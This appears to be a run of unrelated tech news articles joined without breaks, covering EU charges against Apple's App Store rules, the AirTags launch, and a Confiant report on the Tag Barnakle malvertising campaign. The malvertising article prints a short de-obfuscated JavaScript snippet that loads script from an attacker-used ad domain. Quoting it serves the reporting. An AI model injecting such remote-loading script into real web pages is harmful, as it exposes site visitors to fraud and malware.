Margrethe Vestager, the EU’s competition chief, will later this week issue charges against Apple stating that its App Store rules break EU law, according to several people with direct knowledge of the situation.
The charges relate to a complaint brought two years ago by Spotify, the music streaming app, that Apple takes 30 percent commission to distribute apps through its iPhone App Store and forbids apps from directing users to pay for subscriptions elsewhere.
Brussels opened an official competition investigation in June, when Vestager said Apple appeared to be a so-called gatekeeper “when it comes to the distribution of apps and content to users of Apple’s popular devices.”
Apple, which has denied any allegations of anticompetitive behavior, did not immediately reply to a request for comment. At the time of Spotify’s initial complaint, Apple said the music app wanted to “keep all the benefits” of its App Store “without making any contributions to that marketplace.”
The case is one of the most high-profile antitrust cases in Europe against a US tech group. The people familiar with the process warned that the timing could still slip.
Brussels is also investigating Apple for allegedly breaking EU laws when it comes to promoting its own ebooks over rivals on the App Store and over concerns that it undermines competition in mobile payments by limiting access to the near-field communication chips in iPhones for rivals to Apple Pay.
If Apple is ultimately found guilty of breaking EU rules, after a long period of potential appeals, the company faces a fine of up to 10 percent of global revenues.
Separately, Brussels is pushing through a new Digital Markets Act that seeks to define when Big Tech companies are behaving in an anti-competitive way so that remedies can be applied faster.
Carolyn Wolfman-Estrada, engineering program manager at Apple, presents AirTags (with one visible in her right hand).
Apple
AirTags—visually customizable to boot!
Apple introduced AirTags alongside several different kinds of accessories to enhance their flair and attach-ability.
Apple
AirTags partner with an iPhone app to help direct you to a specific location for those lost keys.
Apple began taking orders Friday for its new AirTags location-tracking product and the new purple color for the iPhone 12, but AirTag supply is already falling behind demand.
Announced earlier this week, AirTags are Apple’s answer to the already established and relatively popular Tile product. Each AirTag is a small disc that can be attached to a valuable possession so you can track it with your iPhone if you lose it.
Each AirTag sends out a Bluetooth signal that nearby compatible devices in the “Find My” network detect. When a device detects the AirTag, it reports its location, and you can use the newly rebranded “Find My” app to locate it; Apple claims the process is anonymous, secure, and encrypted.
Additionally, recent iPhone models that have Apple’s U1 ultra-wideband chip (the iPhone 11 and iPhone 12 families) enable a feature called precision finding, which guides you directly to the AirTag with more precision.
A single AirTag costs $29, but they are also sold in packs of four for $99. If you order through the Apple store, you can get your AirTag engraved at no additional charge, but that service is not available through other retailers.
Unfortunately for those excited to snag AirTags imminently, orders are already backed up two to five weeks in Apple’s online store. When you might get an AirTag depends on whether you opt for engravings; as of this writing, AirTags that are engraved are estimated to deliver as late as June 1, while AirTags that are not engraved could arrive as soon as May 3.
In addition to the AirTags themselves, Apple is selling numerous AirTags accessories, like key rings and luggage tags that can house the devices. They come in a range of colors, like saddle brown, sunflower, pink, and blue. Many of the accessories are made with partners Apple has worked with on iPhone or Apple Watch accessories in the past, like Belkin or Hermès.
As noted above, Apple is also selling a new purple variant of the iPhone 12 and iPhone 12 mini. At present, the purple iPhone 12 is still showing its initial intended delivery date: April 30.
Hackers have compromised more than 120 ad servers over the past year in an ongoing campaign that displays malicious advertisements on tens of millions, if not hundreds of millions, of devices as they visit sites that, by all outward appearances, are benign.
Malvertising is the practice of delivering ads to people as they visit trusted websites. The ads embed JavaScript that surreptitiously exploits software flaws or tries to trick visitors into installing an unsafe app, paying fraudulent computer support fees, or taking other harmful actions. Typically, the scammers behind this Internet scourge pose as buyers and pay ad-delivery networks to display the malicious ads on individual sites.
Going for the jugular
Infiltrating the ad ecosystem by posing as a legitimate buyer requires resources. For one, scammers must invest time learning how the market works and then creating an entity that has a trustworthy reputation. The approach also requires paying money to buy space for the malicious ads to run. That’s not the technique used by a malvertising group that security firm Confiant calls Tag Barnakle.
“Tag Barnakle, on the other hand, is able to bypass this initial hurdle completely by going straight for the jugular—mass compromise of ad serving infrastructure,” Confiant researcher Eliya Stein wrote in a blog post published Monday. “Likely, they’re also able to boast an ROI [return on investment] that would eclipse their rivals as they don’t need to spend a dime to run ad campaigns.”
Over the past year, Tag Barnakle has infected more than 120 servers running Revive, an open source app for organizations that want to run their own ad server rather than relying on a third-party service. The 120 figure is twice the number of infected Revive servers Confiant found last year.
Once it has compromised an ad server, Tag Barnakle loads a malicious payload on it. To evade detection, the group uses client-side fingerprinting to ensure only a small number of the most attractive targets receive the malicious ads. The servers that deliver a secondary payload to those targets also use cloaking techniques to ensure that they also fly under the radar.
When Confiant reported last year on Tag Barnakle, it found the group had infected about 60 Revive servers. The feat allowed the group to distribute ads on more than 360 Web properties. The ads pushed fake Adobe Flash updates that when run installed malware on desktop computers.
This time, Tag Barnakle is targeting both iPhone and Android users. Websites that receive an ad through a compromised server deliver highly obfuscated JavaScript that determines if a visitor is using an iPhone or Android device.
var aBdDGL0KZhomY5Zl = document["createElement"]("script");
aBdDGL0KZhomY5Zl["setAtrribute"]("text/javascript");
aBdDGL0KZhomY5Zl["setAtrribute"]("src", "https://overgalladean[.]com/apu.php?zoneid=2721667");
As the de-obfuscated code shows, the ads are served through overgalladean[.]com, a domain that Confiant said is used by PropellerAds, an ad network that security firms including Malwarebytes have long documented as malicious.
When Confiant replayed the Propeller Ads click tracker on the types of devices Tag Barnakle was targeting, they saw ads like these ones:
The ads mostly lure targets to an app store listing for fake security, safety, or VPN apps with hidden subscription costs or “siphon off traffic for nefarious ends.”
With ad servers frequently integrated with multiple ad exchanges, the ads have the potential to spread widely through hundreds, possibly thousands, of individual websites. Confiant doesn’t know how many end users are exposed to the malvertising but the firm believes the number is high.
“If we consider that some of these media companies have [Revive] integrations with leading programmatic advertising platforms, Tag Barnakle’s reach is easily in the tens if not hundreds of millions of devices,” Stein wrote. “This is a conservative estimate that takes into consideration the fact that they cookie their victims in order to reveal the payload with low frequency, likely to slow down detection of their presence.”